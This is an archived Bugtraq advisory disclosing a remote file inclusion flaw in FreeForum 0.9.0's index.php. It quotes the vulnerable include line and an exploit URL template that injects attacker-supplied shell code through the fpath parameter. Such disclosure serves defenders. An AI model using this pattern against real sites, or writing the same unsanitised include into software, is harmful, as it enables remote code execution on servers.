Bugtraq mailing list archives

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability

From: "me you" <r.5.7 () hotmail com>
Date: Sun, 21 Jan 2007 13:18:51 +0000

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability

Script: FreeForum

Version: 0.9.0

URL: http://www.phpfreaks.com/scripts.php?action=gotoDownload&script_id=616

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Bug in : index.php

code :
include("$fpath/forum.php");

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Explo!T :.
^^^^^
/index.php?fpath=[SHe1L-CoDe]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GreeTz To :.

Dr.2 , Asbmay , General C , ToOoFa , ThE-LoRd-Of-CrAcKiNg , SHiKaA, str0ke


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________________________________________________________

The MSN Entertainment Guide to Golden Globes is here. Get all the scoop.http://tv.msn.com/tv/globes2007/?icid=nctagline2

Current thread:

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability me you (Jan 22)
- Re: FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability Stefano Zanero (Jan 24)